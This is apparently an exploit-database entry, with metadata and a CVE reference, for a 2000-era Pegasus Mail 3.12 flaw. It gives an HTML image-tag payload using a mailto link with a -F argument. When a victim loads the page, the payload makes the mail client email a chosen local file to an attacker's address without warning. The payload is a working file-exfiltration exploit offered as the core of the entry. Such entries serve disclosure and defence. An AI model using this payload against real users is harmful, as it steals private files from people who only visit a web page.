David Harris Pegasus Mail 3.12 - File Forwarding
Author: Imran Ghory
type: remote
platform: windows
port:
date_added: 2000-10-03
date_updated: 2012-08-05
verified: 1
codes: CVE-2000-0930;OSVDB-1583
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/1738/info
It is possible for a malicious website operator to obtain copies of known files on a remote system if a website visitor is running Pegasus Mail client.
If the following code were to be inserted into a HTML document and a user were to load that particular webpage, the local file would be automatically sent from the Pegasus Mail client to the email address specified without any prior warning:
<img sr c="mailto:email@address.com -F c:\path\file.ext">